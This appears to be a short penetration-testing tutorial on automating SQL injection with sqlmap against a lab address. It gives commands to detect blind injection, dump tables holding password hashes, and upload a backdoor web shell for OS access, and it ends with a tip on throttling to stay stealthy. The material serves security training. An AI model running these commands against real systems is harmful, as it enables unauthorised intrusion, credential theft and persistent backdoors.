Automating SQL Injection with sqlmap

Published on March 26, 2025

Manual SQL injection attacks can be automated using sqlmap, a powerful tool included in Kali Linux. It detects and exploits injection points, dumps databases, and even opens OS shells.

Basic Scan Example

To begin scanning a target URL, specify the vulnerable parameter:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

Sqlmap quickly detects a time-based blind SQLi vulnerability and reveals server, application, and DBMS details.

Dumping Data from the Database

Use the --dump flag to extract database content:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

This command extracts usernames, password hashes, and other sensitive fields from vulnerable tables.

Intercepting POST Requests

When targeting a POST request, intercept it with Burp and save it to a file (e.g., post.txt): 

POST /search.php HTTP/1.1
Host: 192.168.50.19
...
item=test

Gaining Shell Access

Sqlmap can use a web shell for OS-level access if the server is writable: 

sqlmap -r post.txt -p item --os-shell --web-root="/var/www/html/tmp"

After uploading a backdoor, sqlmap provides an interactive shell: 

os-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stealth Consideration

sqlmap is noisy by nature. It should be avoided in stealth operations unless tuned carefully with delay and throttle options.

Related Articles